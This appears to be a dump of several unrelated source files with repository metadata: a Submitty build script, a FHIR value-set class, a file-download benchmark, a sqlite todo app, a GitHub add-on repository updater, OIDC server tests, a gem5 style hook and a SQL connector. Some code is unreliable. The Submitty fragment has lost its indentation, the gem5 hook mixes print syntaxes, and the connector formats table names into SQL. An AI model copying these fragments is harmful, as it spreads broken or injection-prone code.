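# read above, with illustrative values only). Note that for "clean" and
# "no_build" mere presence of the key is what matters:
#   {
#     "semester": "f21",
#     "course": "sample",
#     "gradeable": "hw01",   # optional
#     "clean": true,         # optional
#     "no_build": true       # optional
#   }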
# ------------------------------------------------------------------------
def build_all():
for filename in glob.iglob("/var/local/submitty/to_be_built/*.json"):
with open(filename) as data_file:
print("going to process: " + filename)
data = json.load(data_file)
# after loading the contents of the file, remove it first
os.remove(filename)
# then build it, because build is slow (and we might have a race condition)
build_one(data)
print("finished with " + filename)
# ------------------------------------------------------------------------
# MAIN LOOP
# this script should only run for 5 minutes, then another process running
# this script will take over
# ------------------------------------------------------------------------
# this script is intended to be run only from the cron job of DAEMON_USER
def main():
username = pwd.getpwuid(os.getuid()).pw_name
if username != "submitty_daemon":
raise SystemError("ERROR! This script must be run by submitty_daemon")
# ensure future pushd & popd commands don't complain
os.chdir("/var/local/submitty/to_be_built/")
start = time.time()
count = 0
while True:
count += 1
now = time.time()
formattedtime = time.strftime('%X %x %Z')
print("{:s} build_config_upload.py loop {:d}".format(formattedtime, count))
build_all()
        # stop if it's been more than 5 minutes
        if (now-start) >= 5 * 60:
            print("exiting for time")
raise SystemExit()
# sleep for 5 seconds
time.sleep(5)
# ------------------------------------------------------------------------
if __name__ == "__main__":
main()
| 32.460674
| 104
| 0.563517
|
4a18d789acfe6bb45d01b597f7252d7be551cb82
| 813
|
py
|
Python
|
spark_auto_mapper_fhir/value_sets/v2_0372.py
|
imranq2/SparkAutoMapper.FHIR
|
dd23b218fb0097d1edc2f3e688e8d6d4d7278bd2
|
[
"Apache-2.0"
] | 1
|
2020-10-31T23:25:07.000Z
|
2020-10-31T23:25:07.000Z
|
spark_auto_mapper_fhir/value_sets/v2_0372.py
|
icanbwell/SparkAutoMapper.FHIR
|
98f368e781b46523142c7cb513c670d659a93c9b
|
[
"Apache-2.0"
] | null | null | null |
spark_auto_mapper_fhir/value_sets/v2_0372.py
|
icanbwell/SparkAutoMapper.FHIR
|
98f368e781b46523142c7cb513c670d659a93c9b
|
[
"Apache-2.0"
] | null | null | null |
from __future__ import annotations
from spark_auto_mapper_fhir.fhir_types.uri import FhirUri
from spark_auto_mapper_fhir.value_sets.generic_type import GenericTypeCode
from spark_auto_mapper.type_definitions.defined_types import AutoMapperTextInputType
# This file is auto-generated by generate_classes so do not edit manually
# noinspection PyPep8Naming
class V2_0372(GenericTypeCode):
"""
v2.0372
From: http://terminology.hl7.org/ValueSet/v2-0372 in v2-tables.xml
FHIR Value set/code system definition for HL7 v2 table 0372 ( Specimen
component)
"""
def __init__(self, value: AutoMapperTextInputType):
super().__init__(value=value)
"""
http://terminology.hl7.org/ValueSet/v2-0372
"""
codeset: FhirUri = "http://terminology.hl7.org/ValueSet/v2-0372"
| 31.269231
| 84
| 0.757688
|
4a18d8883b8324a5375ec84ac49970584c01ce45
| 4,659
|
py
|
Python
|
download_bench.py
|
itamaro/download-files-benchmark
|
806c309be987f069e98aa8d8978616cf5a522280
|
[
"MIT"
] | null | null | null |
download_bench.py
|
itamaro/download-files-benchmark
|
806c309be987f069e98aa8d8978616cf5a522280
|
[
"MIT"
] | null | null | null |
download_bench.py
|
itamaro/download-files-benchmark
|
806c309be987f069e98aa8d8978616cf5a522280
|
[
"MIT"
] | null | null | null |
#!/usr/bin/env python3
# Copyright 2018 Itamar Ostricher
"""Benchmark and compare different ways to download files in Python"""
import base64
from concurrent.futures import ThreadPoolExecutor
from functools import wraps
import hashlib
import itertools
import os
import shutil
import subprocess
import tempfile
from time import time
import humanize
import requests
FILES = [
{
'name': 'LC80440342016259LGN00_BQA.TIF',
'url': 'https://storage.googleapis.com/gcp-public-data-landsat/LC08/PRE/044/034/LC80440342016259LGN00/LC80440342016259LGN00_BQA.TIF',
'md5': b'zqigvl5Envmi/GLc8yH51A==', # base64
'size': '3.2MB',
},
{
'name': 'LC80440342016259LGN00_B1.TIF',
'url': 'https://storage.googleapis.com/gcp-public-data-landsat/LC08/PRE/044/034/LC80440342016259LGN00/LC80440342016259LGN00_B1.TIF',
'md5': b'835L6B5frB0zCB6s22r2Sw==', # base64
'size': '71.26MB',
},
{
'name': 'LC80440342016259LGN00_B8.TIF',
'url': 'https://storage.googleapis.com/gcp-public-data-landsat/LC08/PRE/044/034/LC80440342016259LGN00/LC80440342016259LGN00_B8.TIF',
'md5': b'y795LrUzBwk2tL6PM01cEA==', # base64
'size': '304.12MB',
},
]
DOWNLOAD_FUNCTIONS = []
def bench(download_func):
"""A decorator for benchmarked download functions.
Registers the function in the global list of function to benchmark,
and computes total download time that is returned as the result.
"""
@wraps(download_func)
def wrapper(*args, **kwargs):
start = time()
download_func(*args, **kwargs)
end = time()
return end - start
DOWNLOAD_FUNCTIONS.append(wrapper)
return wrapper
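# Sketch (added for illustration): any additional download strategy only needs
# the @bench decorator to join the run; e.g. a hypothetical urllib-based
# variant would be registered like this:
#   @bench
#   def urllib_urlretrieve(url, fname):
#       """Download url into fname using urllib.request.urlretrieve"""
#       import urllib.request
#       urllib.request.urlretrieve(url, fname)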
def calc_md5(fname):
"""Return the base64 encoding of the MD5 hash of the file fname."""
with open(fname, 'rb') as fp:
md5hash = hashlib.md5()
# read in chunks of 1MB
for chunk in iter(lambda: fp.read(1024 * 1024), b''):
md5hash.update(chunk)
return base64.b64encode(md5hash.digest())
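# Example (added): calc_md5 returns the digest in the same base64 bytes form
# as the 'md5' fields in FILES, so a direct comparison suffices:
#   calc_md5(fname) == FILES[0]['md5']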
def file_size(fname):
"""Return file size (in bytes) of file fname"""
with open(fname, 'rb') as fp:
return fp.seek(0, 2)
def bench_download(file_desc, download_func):
"""Benchmark a download function"""
fp = tempfile.NamedTemporaryFile(delete=False)
fp.close()
try:
# time a download of file_desc using download_func
total_time = download_func(file_desc['url'], fp.name)
# compute MD5 to verify correctness
md5 = calc_md5(fp.name)
if md5 != file_desc['md5']:
print(f'Error in benchmark of {download_func.__name__} using '
f'file desc {file_desc["name"]} ({file_desc["size"]}): '
f'MD5 mismatch ({md5} != {file_desc["md5"]})')
else:
total_bytes = file_size(fp.name)
speed = total_bytes / total_time
print(f'{download_func.__name__: <22}'
f'{total_time: >6.2f} sec'
f'{humanize.naturalsize(total_bytes): >10}'
f'{humanize.naturalsize(speed): >10}/s')
finally:
os.unlink(fp.name)
@bench
def requests_raw_shutil(url, fname):
"""Download url into fname using requests raw with shutil copyfileobj"""
with requests.get(url, stream=True) as response:
with open(fname, 'wb') as fp:
shutil.copyfileobj(response.raw, fp)
@bench
def requests_chunks(url, fname):
"""Download url into fname using requests chunked content iterator"""
with requests.get(url, stream=True) as response:
with open(fname, 'wb') as fp:
for chunk in response.iter_content(chunk_size=128 * 1024):
fp.write(chunk)
@bench
def wget_subprocess(url, fname):
"""Download url into fname using wget in a subprocess"""
subprocess.check_call(['wget', '-q', '-O', fname, url])
@bench
def curl_subprocess(url, fname):
"""Download url into fname using curl in a subprocess"""
subprocess.check_call(['curl', '-s', '-o', fname, url])
def run_download_bench():
"""Run the download benchmarking over all registered functions and files"""
print('=== Benchmark download in main thread ===')
list(map(lambda args: bench_download(*args),
itertools.product(FILES, DOWNLOAD_FUNCTIONS)))
print('=== Benchmark download in a single worker thread pool ===')
with ThreadPoolExecutor(max_workers=1) as executor:
list(executor.map(lambda args: bench_download(*args),
itertools.product(FILES, DOWNLOAD_FUNCTIONS)))
if __name__ == '__main__':
run_download_bench()
| 31.47973
| 141
| 0.647135
|
4a18d96c209b4d06a0ebb1cf440df9c86ff719c6
| 2,960
|
py
|
Python
|
rogue/api/todo/controler.py
|
4383/rogue
|
faafec989145c301459e87c67af6c4728950fb3c
|
[
"MIT"
] | null | null | null |
rogue/api/todo/controler.py
|
4383/rogue
|
faafec989145c301459e87c67af6c4728950fb3c
|
[
"MIT"
] | null | null | null |
rogue/api/todo/controler.py
|
4383/rogue
|
faafec989145c301459e87c67af6c4728950fb3c
|
[
"MIT"
] | null | null | null |
# -*- coding: utf-8 -*-
import os
import sqlite3
BASE_PATH = os.path.dirname(__file__)
USER_PATH = os.path.expanduser('~')
TODO_PATH = os.path.join(USER_PATH, '.rogue')
DATABASE_PATH = os.path.join(TODO_PATH, 'todo.db')
def sort(tasks):
sorted_tasks = {
'hight': [],
'low': [],
'normal': []
}
for el in tasks:
priority = humanize(el[5])
sorted_tasks[priority].append(el)
return sorted_tasks
def convert_for_database(priority):
binding = {'hight': 'H', 'low': 'L', 'normal': 'N'}
return binding[priority]
def humanize(priority):
binding = {'H': 'hight', 'L': 'low', 'N': 'normal'}
return binding[priority]
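# Round-trip sketch (added): the two maps are inverses over the stored codes,
# e.g. humanize(convert_for_database('low')) == 'low'.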
class Todo():
connection = None
cursor = None
def __init__(self):
if not self.__can_store():
self.__connect()
self.__initialize()
else:
self.__connect()
def __del__(self):
self.__disconnect()
def __connect(self):
self.connection = sqlite3.connect(DATABASE_PATH)
self.cursor = self.connection.cursor()
def __disconnect(self):
self.connection.close()
def __can_store(self):
if not os.path.isfile(DATABASE_PATH):
return False
return True
def __initialize(self):
if not os.path.isdir(TODO_PATH):
os.makedirs(TODO_PATH)
self.cursor.execute('''
CREATE TABLE tasks
(
id INTEGER PRIMARY KEY AUTOINCREMENT,
content TEXT,
created_at DATETIME DEFAULT CURRENT_TIMESTAMP,
finished_at DATETIME,
active BOOLEAN DEFAULT 1 CHECK (active IN (0, 1)),
priority TEXT DEFAULT 'N' CHECK (priority IN ('H', 'L', 'N'))
)
''')
self.connection.commit()
def add(self, task, priority):
self.cursor.execute('''
INSERT INTO tasks (content, priority) VALUES (?, ?)
'''
, [task, convert_for_database(priority)])
self.connection.commit()
def ls(self, active=False):
return self.cursor.execute('''
SELECT * FROM tasks
''')
def info(self, identifier):
request = '''
SELECT * FROM tasks WHERE id IN (?)
'''
return self.cursor.execute(request, [identifier])
def infos(self, identifiers):
request = '''
SELECT * FROM tasks WHERE id IN ({})
'''.format(','.join(['?']*len(identifiers)))
return self.cursor.execute(request, identifiers)
def done(self, identifier):
self.cursor.execute('''
UPDATE tasks SET
active = 0
WHERE id=?
''', [identifier])
self.connection.commit()
def delete(self, identifier):
self.cursor.execute('''
DELETE FROM tasks
WHERE id=?
''', [identifier])
self.connection.commit()
| 25.084746
| 77
| 0.55
|
4a18da132aa50c2da33de370ab7e129187312262
| 1,824
|
py
|
Python
|
repositoryupdater/cli.py
|
marciogranzotto/repository-updater
|
f703142f84659e4d478a6fd6d569788c9fb5dbbf
|
[
"MIT"
] | 9
|
2018-05-02T10:10:42.000Z
|
2022-03-30T06:09:57.000Z
|
repositoryupdater/cli.py
|
marciogranzotto/repository-updater
|
f703142f84659e4d478a6fd6d569788c9fb5dbbf
|
[
"MIT"
] | 11
|
2018-06-07T19:47:32.000Z
|
2022-02-04T19:10:09.000Z
|
repositoryupdater/cli.py
|
marciogranzotto/repository-updater
|
f703142f84659e4d478a6fd6d569788c9fb5dbbf
|
[
"MIT"
] | 6
|
2020-01-27T13:14:40.000Z
|
2022-03-30T06:11:28.000Z
|
"""
CLI Module.
Handles CLI for the Repository Updater
"""
from os import environ
from sys import argv
import click
import crayons
from . import APP_FULL_NAME, APP_VERSION
from .github import GitHub
from .repository import Repository
@click.command()
@click.option(
"--token",
hide_input=True,
prompt="GitHub access token",
help="GitHub access token",
metavar="<TOKEN>",
)
@click.option(
"--repository",
prompt="Home Assistant Addons repository to update",
help="The Home Assistant Addons repository to update",
metavar="<orgname/reponame>",
)
@click.option("--addon", help="Update a single/specific add-on", metavar="<TARGET>")
@click.option("--force", is_flag=True, help="Force an update of the add-on repository")
@click.version_option(APP_VERSION, prog_name=APP_FULL_NAME)
def repository_updater(token, repository, addon, force):
"""Community Home Assistant Add-ons Repository Updater."""
click.echo(crayons.blue(APP_FULL_NAME, bold=True))
click.echo(crayons.blue("-" * 51, bold=True))
github = GitHub(token)
click.echo(
"Authenticated with GitHub as %s"
% crayons.yellow(github.get_user().name, bold=True)
)
repository = Repository(github, repository, addon, force)
repository.update()
repository.cleanup()
def git_askpass():
"""
Git credentials helper.
Short & sweet script for use with git clone and fetch credentials.
Requires GIT_USERNAME and GIT_PASSWORD environment variables,
intended to be called by Git via GIT_ASKPASS.
"""
if argv[1] == "Username for 'https://github.com': ":
print(environ["GIT_USERNAME"])
exit()
if argv[1] == "Password for 'https://" "%(GIT_USERNAME)s@github.com': " % environ:
print(environ["GIT_PASSWORD"])
exit()
exit(1)
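# Usage sketch (added; an assumption about deployment rather than code from
# this module): Git calls git_askpass via a wrapper pointed to by GIT_ASKPASS,
# with the credentials supplied through the environment, roughly:
#   GIT_ASKPASS=askpass.sh GIT_USERNAME=bot GIT_PASSWORD=token git clone <url>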
| 28.061538
| 87
| 0.683662
|
4a18da16656d7a48a3b6ef26f46bf3f12049d339
| 8,044
|
py
|
Python
|
tests/test_server_16_endpoint_context.py
|
IdentityPython/idpy-oidc
|
44f78f5f70d0c5ddc0108fa9a241c460179b53a8
|
[
"Apache-2.0"
] | 1
|
2022-03-24T23:39:22.000Z
|
2022-03-24T23:39:22.000Z
|
tests/test_server_16_endpoint_context.py
|
IdentityPython/idpy-oidc
|
44f78f5f70d0c5ddc0108fa9a241c460179b53a8
|
[
"Apache-2.0"
] | null | null | null |
tests/test_server_16_endpoint_context.py
|
IdentityPython/idpy-oidc
|
44f78f5f70d0c5ddc0108fa9a241c460179b53a8
|
[
"Apache-2.0"
] | null | null | null |
import copy
import os
import pytest
from cryptojwt.key_jar import build_keyjar
from idpyoidc.server import OPConfiguration
from idpyoidc.server import Server
from idpyoidc.server import do_endpoints
from idpyoidc.server.endpoint import Endpoint
from idpyoidc.server.endpoint_context import EndpointContext
from idpyoidc.server.endpoint_context import get_provider_capabilities
from idpyoidc.server.exception import OidcEndpointError
from idpyoidc.server.session.manager import create_session_manager
from idpyoidc.server.user_authn.authn_context import INTERNETPROTOCOLPASSWORD
from idpyoidc.server.util import allow_refresh_token
from . import CRYPT_CONFIG
from . import SESSION_PARAMS
from . import full_path
KEYDEFS = [
{"type": "RSA", "key": "", "use": ["sig"]},
{"type": "EC", "crv": "P-256", "use": ["sig"]},
]
KEYJAR = build_keyjar(KEYDEFS)
class Endpoint_1(Endpoint):
name = "userinfo"
default_capabilities = {
"claim_types_supported": ["normal", "aggregated", "distributed"],
"userinfo_signing_alg_values_supported": None,
"userinfo_encryption_alg_values_supported": None,
"userinfo_encryption_enc_values_supported": None,
"client_authn_method": ["bearer_header", "bearer_body"],
}
conf = {
"issuer": "https://example.com/",
"template_dir": "template",
"keys": {"uri_path": "static/jwks.json", "key_defs": KEYDEFS, "read_only": True},
"capabilities": {
"subject_types_supported": ["public", "pairwise"],
"grant_types_supported": [
"authorization_code",
"implicit",
"urn:ietf:params:oauth:grant-type:jwt-bearer",
"refresh_token",
],
},
"endpoint": {
"userinfo": {
"path": "userinfo",
"class": Endpoint_1,
"kwargs": {
"client_authn_method": [
"private_key_jwt",
"client_secret_jwt",
"client_secret_post",
"client_secret_basic",
]
},
}
},
"token_handler_args": {
"jwks_def": {
"private_path": "private/token_jwks.json",
"read_only": False,
"key_defs": [{"type": "oct", "bytes": "24", "use": ["enc"], "kid": "code"}],
},
"code": {"lifetime": 600, "kwargs": {"crypt_conf": CRYPT_CONFIG}},
"token": {
"class": "idpyoidc.server.token.jwt_token.JWTToken",
"kwargs": {
"lifetime": 3600,
"add_claims_by_scope": True,
"aud": ["https://example.org/appl"],
},
},
"refresh": {
"class": "idpyoidc.server.token.jwt_token.JWTToken",
"kwargs": {
"lifetime": 3600,
"aud": ["https://example.org/appl"],
},
},
"id_token": {"class": "idpyoidc.server.token.id_token.IDToken", "kwargs": {}},
},
"userinfo": {
"class": "idpyoidc.server.user_info.UserInfo",
"kwargs": {"db_file": full_path("users.json")},
},
"claims_interface": {"class": "idpyoidc.server.session.claims.ClaimsInterface", "kwargs": {}},
"session_params": SESSION_PARAMS,
}
class TestEndpointContext:
@pytest.fixture(autouse=True)
def create_endpoint_context(self):
self.endpoint_context = EndpointContext(
conf=conf,
server_get=self.server_get,
keyjar=KEYJAR,
)
def server_get(self, *args):
if args[0] == "endpoint_context":
return self.endpoint_context
def test(self):
endpoint = do_endpoints(conf, self.server_get)
_cap = get_provider_capabilities(conf, endpoint)
pi = self.endpoint_context.create_providerinfo(_cap)
assert set(pi.keys()) == {
"claims_supported",
"issuer",
"version",
"scopes_supported",
"subject_types_supported",
"grant_types_supported",
}
def test_allow_refresh_token(self):
self.endpoint_context.session_manager = create_session_manager(
self.server_get,
self.endpoint_context.th_args,
sub_func=self.endpoint_context._sub_func,
conf=conf,
)
assert allow_refresh_token(self.endpoint_context)
# Have the software but is not expected to use it.
self.endpoint_context.conf["capabilities"]["grant_types_supported"] = [
"authorization_code",
"implicit",
"urn:ietf:params:oauth:grant-type:jwt-bearer",
]
assert allow_refresh_token(self.endpoint_context) is False
# Don't have the software but are expected to use it.
self.endpoint_context.conf["capabilities"]["grant_types_supported"] = [
"authorization_code",
"implicit",
"urn:ietf:params:oauth:grant-type:jwt-bearer",
"refresh_token",
]
del self.endpoint_context.session_manager.token_handler.handler["refresh_token"]
with pytest.raises(OidcEndpointError):
assert allow_refresh_token(self.endpoint_context) is False
class Tokenish(Endpoint):
default_capabilities = None
provider_info_attributes = {
"token_endpoint_auth_methods_supported": [
"client_secret_post",
"client_secret_basic",
"client_secret_jwt",
"private_key_jwt",
],
"token_endpoint_auth_signing_alg_values_supported": None,
}
auth_method_attribute = "token_endpoint_auth_methods_supported"
BASEDIR = os.path.abspath(os.path.dirname(__file__))
CONF = {
"issuer": "https://example.com/",
"httpc_params": {"verify": False, "timeout": 1},
"token_expires_in": 600,
"grant_expires_in": 300,
"refresh_token_expires_in": 86400,
"capabilities": {
"subject_types_supported": ["public", "pairwise"],
"grant_types_supported": [
"authorization_code",
"implicit",
"urn:ietf:params:oauth:grant-type:jwt-bearer",
"refresh_token",
],
},
"keys": {
"public_path": "jwks.json",
"key_defs": KEYDEFS,
"private_path": "own/jwks.json",
"uri_path": "static/jwks.json",
},
"authentication": {
"anon": {
"acr": INTERNETPROTOCOLPASSWORD,
"class": "idpyoidc.server.user_authn.user.NoAuthn",
"kwargs": {"user": "diana"},
}
},
"template_dir": "template",
}
@pytest.mark.parametrize(
"kwargs",
[
{},
{"client_authn_method": ["client_secret_jwt", "private_key_jwt"]},
{"token_endpoint_auth_methods_supported": ["client_secret_jwt", "private_key_jwt"]},
],
)
def test_provider_configuration(kwargs):
conf = copy.deepcopy(CONF)
conf["endpoint"] = {
"endpoint": {"path": "endpoint", "class": Tokenish, "kwargs": kwargs},
}
server = Server(OPConfiguration(conf=conf, base_path=BASEDIR), cwd=BASEDIR)
server.endpoint_context.cdb["client_id"] = {}
_endpoints = do_endpoints(conf, server.server_get)
_cap = get_provider_capabilities(conf, _endpoints)
pi = server.endpoint_context.create_providerinfo(_cap)
assert set(pi.keys()) == {
"version",
"acr_values_supported",
"issuer",
"jwks_uri",
"scopes_supported",
"grant_types_supported",
"claims_supported",
"subject_types_supported",
"token_endpoint_auth_methods_supported",
"token_endpoint_auth_signing_alg_values_supported",
}
if kwargs:
assert pi["token_endpoint_auth_methods_supported"] == [
"client_secret_jwt",
"private_key_jwt",
]
else:
assert pi["token_endpoint_auth_methods_supported"] == [
"client_secret_post",
"client_secret_basic",
"client_secret_jwt",
"private_key_jwt",
]
| 32.176
| 98
| 0.602685
|
4a18db01f46f4a43c8095e773595c56eb1751ffe
| 3,432
|
py
|
Python
|
util/git-pre-commit.py
|
leonardopsantos/cmp237
|
9be2df44253fce38e25edd3a515d476feefbd675
|
[
"BSD-3-Clause"
] | null | null | null |
util/git-pre-commit.py
|
leonardopsantos/cmp237
|
9be2df44253fce38e25edd3a515d476feefbd675
|
[
"BSD-3-Clause"
] | null | null | null |
util/git-pre-commit.py
|
leonardopsantos/cmp237
|
9be2df44253fce38e25edd3a515d476feefbd675
|
[
"BSD-3-Clause"
] | null | null | null |
#!/usr/bin/env python
#
# Copyright (c) 2016 ARM Limited
# All rights reserved
#
# The license below extends only to copyright in the software and shall
# not be construed as granting a license to any other intellectual
# property including but not limited to intellectual property relating
# to a hardware implementation of the functionality of the software
# licensed hereunder. You may use the software subject to the license
# terms below provided that you ensure that this notice is replicated
# unmodified and in its entirety in all distributions of the software,
# modified or unmodified, in source code or in binary form.
#
# Redistribution and use in source and binary forms, with or without
# modification, are permitted provided that the following conditions are
# met: redistributions of source code must retain the above copyright
# notice, this list of conditions and the following disclaimer;
# redistributions in binary form must reproduce the above copyright
# notice, this list of conditions and the following disclaimer in the
# documentation and/or other materials provided with the distribution;
# neither the name of the copyright holders nor the names of its
# contributors may be used to endorse or promote products derived from
# this software without specific prior written permission.
#
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS FOR
# A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE COPYRIGHT
# OWNER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, INDIRECT, INCIDENTAL,
# SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES (INCLUDING, BUT NOT
# LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR SERVICES; LOSS OF USE,
# DATA, OR PROFITS; OR BUSINESS INTERRUPTION) HOWEVER CAUSED AND ON ANY
# THEORY OF LIABILITY, WHETHER IN CONTRACT, STRICT LIABILITY, OR TORT
# (INCLUDING NEGLIGENCE OR OTHERWISE) ARISING IN ANY WAY OUT OF THE USE
# OF THIS SOFTWARE, EVEN IF ADVISED OF THE POSSIBILITY OF SUCH DAMAGE.
#
# Authors: Andreas Sandberg
import os
import sys
from style.repo import GitRepo
from style.verifiers import all_verifiers, all_regions
from style.style import StdioUI
import argparse
parser = argparse.ArgumentParser(
description="gem5 git style checker hook")
parser.add_argument("--verbose", "-v", action="store_true",
help="Produce verbose output")
args = parser.parse_args()
git = GitRepo()
opts = {}
repo_base = git.repo_base()
context = 8
ui = StdioUI()
os.chdir(repo_base)
failing_files = set()
for status, fname in git.status(filter="MA", cached=True):
if args.verbose:
print "Checking %s..." % fname
if status == "M":
regions = git.staged_regions(fname, context=context)
else:
regions = all_regions
verifiers = [ v(ui, opts, base=repo_base) for v in all_verifiers ]
for v in verifiers:
if v.check(fname, regions):
failing_files.add(fname)
if failing_files:
    print(file=sys.stderr)
    print("Style checker failed for the following files:", file=sys.stderr)
    for f in failing_files:
        print("\t%s" % f, file=sys.stderr)
    print(file=sys.stderr)
    print("Please run the style checker manually to fix the offending files.\n"
          "To check your modifications, run: util/style.py -m", file=sys.stderr)
sys.exit(1)
| 38.133333
| 79
| 0.743881
|
4a18db96c5a3cce133f72d0c13eedcdf780877c6
| 3,433
|
py
|
Python
|
dbconnection/connector.py
|
FrancescoDelBuono/MASQ
|
4299f09a338209fb6f03cc7c0806f8cc01447fe0
|
[
"MIT"
] | 2
|
2020-08-06T10:54:28.000Z
|
2021-02-13T04:59:05.000Z
|
dbconnection/connector.py
|
softlab-unimore/MASQ
|
4299f09a338209fb6f03cc7c0806f8cc01447fe0
|
[
"MIT"
] | 6
|
2020-06-24T08:58:31.000Z
|
2021-09-22T19:18:03.000Z
|
dbconnection/connector.py
|
softlab-unimore/MASQ
|
4299f09a338209fb6f03cc7c0806f8cc01447fe0
|
[
"MIT"
] | null | null | null |
import logging
import pandas as pd
from sqlalchemy import create_engine, MetaData
from sqlalchemy.exc import SQLAlchemyError
import urllib.parse
from utils.dbms_utils import DBMSUtils
def check_url_connection(url_connection):
if 'SQL Server' in url_connection:
odbc_params = urllib.parse.quote_plus(url_connection)
url_connection = f'mssql+pyodbc:///?odbc_connect={odbc_params}'
return url_connection
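# Illustrative example (the DSN below is hypothetical): an ODBC-style SQL
# Server string is percent-encoded and wrapped into a SQLAlchemy pyodbc URL:
#   check_url_connection('DRIVER={SQL Server};SERVER=localhost;DATABASE=db')
#   -> 'mssql+pyodbc:///?odbc_connect=DRIVER%3D%7BSQL+Server%7D%3BSERVER%3Dlocalhost%3BDATABASE%3Ddb'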
def get_connector(url_connection):
url_connection = check_url_connection(url_connection)
try:
engine = create_engine(url_connection)
engine.connect()
return engine
except SQLAlchemyError as e:
logging.error(e)
return None
def get_tables(url_connection):
url_connection = check_url_connection(url_connection)
try:
engine = create_engine(url_connection)
meta_data = MetaData(bind=engine)
meta_data.reflect()
tables = meta_data.tables
names = list(tables.keys())
return names
except SQLAlchemyError as e:
logging.error(e)
return None
def check_table(connector, table):
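    # Placeholder: table existence checking is not implemented yet; always False.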
return False
def check_column(url_connection, table_name, column_name):
url_connection = check_url_connection(url_connection)
engine = create_engine(url_connection)
meta_data = MetaData(bind=engine)
meta_data.reflect()
tables = meta_data.tables
if table_name not in tables:
return False
columns = [val.key for val in tables[table_name].columns]
return column_name in columns
def get_table(url_connection, table_name):
url_connection = check_url_connection(url_connection)
try:
engine = create_engine(url_connection)
query = "select * from {}".format(table_name)
ds = pd.read_sql(query, engine)
return ds
except SQLAlchemyError as e:
logging.error(e)
return None
def get_columns(url_connection, table_name):
url_connection = check_url_connection(url_connection)
try:
# ToDo: modify query using Metadata
engine = create_engine(url_connection)
query = "select * from {}".format(table_name)
ds = pd.read_sql(query, engine)
return ds.columns.to_list()
except SQLAlchemyError as e:
logging.error(e)
return None
def execute_query(url_connection, query):
url_connection = check_url_connection(url_connection)
engine = create_engine(url_connection)
ds = pd.read_sql(query, engine)
return ds
def execute_multi_queries(url_connection, queries):
url_connection = check_url_connection(url_connection)
engine = create_engine(url_connection)
for q in queries[:-1]:
for qq in q.split(';'):
engine.execute(qq)
ds = pd.read_sql(queries[-1], engine)
return ds
def get_column(url_connection, table_name, column_name):
url_connection = check_url_connection(url_connection)
dbms = 'mysql'
if 'mssql' in url_connection:
dbms = 'sqlserver'
try:
engine = create_engine(url_connection)
with engine.connect() as connection:
res = connection.execute("select {} from {}".format(DBMSUtils.get_delimited_col(dbms, column_name),
table_name))
labels = [x[0] for x in res]
return labels
except SQLAlchemyError as e:
logging.error(e)
return None
| 28.848739
| 111
| 0.678415
|
4a18dba9e09715b562e348d15fb38ddbbb48d0a0
| 1,659
|
py
|
Python
|
pycosmosac/param/parameters.py
|
fishjojo/pycosmosac
|
9984a0ca2c9093142de60112f4c9a7fe33865946
|
[
"MIT"
] | 3
|
2020-07-28T02:07:57.000Z
|
2021-02-26T06:25:39.000Z
|
pycosmosac/param/parameters.py
|
fishjojo/pycosmosac
|
9984a0ca2c9093142de60112f4c9a7fe33865946
|
[
"MIT"
] | null | null | null |
pycosmosac/param/parameters.py
|
fishjojo/pycosmosac
|
9984a0ca2c9093142de60112f4c9a7fe33865946
|
[
"MIT"
] | null | null | null |
import json
from pycosmosac.param import data
KEYS = ["a_eff", "f_decay", "q_0", "r_0"]
class Parameters():
'''
Parameters for COSMO-SAC models.
Attributes:
parameters : dict
            user-input parameters
'''
def __init__(self, parameters=data.Saidi_2002):
self.parameters = None
self.load(parameters)
self.sanity_check()
def load(self, parameters):
'''
Load parameters from a dict or from a JSON file
'''
if isinstance(parameters, dict):
self.parameters = parameters
elif isinstance(parameters, str):
try:
with open(parameters, 'r') as f:
self.parameters = json.load(f)
            except (OSError, ValueError):
                raise ValueError("JSON format expected.")
else:
raise TypeError("str or dict expected, while the input is %s." % type(parameters))
def sanity_check(self):
for key in KEYS:
            if key not in self.parameters:
raise RuntimeError("parameter set has to include %s." % key)
def dump_to_string(self):
'''
Dump parameters to string
'''
s = json.dumps(self.parameters)
return s
def dump_to_json(self, name):
'''
Dump parameters to JSON file
'''
        try:
            with open(name, 'w') as f:
                json.dump(self.parameters, f)
        except (OSError, TypeError):
            raise RuntimeError("dumping parameters to JSON file failed.")
if __name__ == "__main__":
myparam = Parameters()
print(myparam.dump_to_string())
myparam.dump_to_json('parameters.json')
| 27.65
| 94
| 0.564798
|
4a18dd399018c60ebda5f4f5cf35824c4dc41184
| 1,003
|
py
|
Python
|
tests/test_docsearch_topic.py
|
bib0x/pydocsearch
|
5724c8205dfe895b51aed4f4d3f0cbd31aeb8c3f
|
[
"Beerware"
] | null | null | null |
tests/test_docsearch_topic.py
|
bib0x/pydocsearch
|
5724c8205dfe895b51aed4f4d3f0cbd31aeb8c3f
|
[
"Beerware"
] | null | null | null |
tests/test_docsearch_topic.py
|
bib0x/pydocsearch
|
5724c8205dfe895b51aed4f4d3f0cbd31aeb8c3f
|
[
"Beerware"
] | null | null | null |
import pytest
from docsearch.docsearch import *
def test_docsearch_show_topic_without_search(cmd_opts, envpaths, capsys):
tests = {
'one_cheat': "\n".join([
"[one_cheat] description for the first cheat",
"- first cheat",
"- second cheat",
"\n"
]),
'one_link': "\n".join([
"[one_link] description of the first link",
"- https://linkone/",
"- https://linktwo/",
"\n"
]),
}
for topic, expected in tests.items():
cmd_opts['topic'] = topic
d = Docsearch(cmd_opts, envpaths)
d.execute()
captured = capsys.readouterr()
assert captured.out == expected
def test_docsearch_empty_topic(cmd_opts, envpaths, capsys):
cmd_opts['topic'] = 'empty_topic'
d = Docsearch(cmd_opts, envpaths)
d.execute()
captured = capsys.readouterr()
expected = 'No data received from YAML file.\n'
assert captured.out == expected
| 29.5
| 73
| 0.57328
|
4a18de32b457d9bba12e985b36607f9607d18f17
| 1,703
|
py
|
Python
|
Lib/keyword.py
|
jiaminglimjm/JawiPython
|
affbb34c7876498a7cc3eef2ef87d59f7cccd8b1
|
[
"0BSD"
] | null | null | null |
Lib/keyword.py
|
jiaminglimjm/JawiPython
|
affbb34c7876498a7cc3eef2ef87d59f7cccd8b1
|
[
"0BSD"
] | null | null | null |
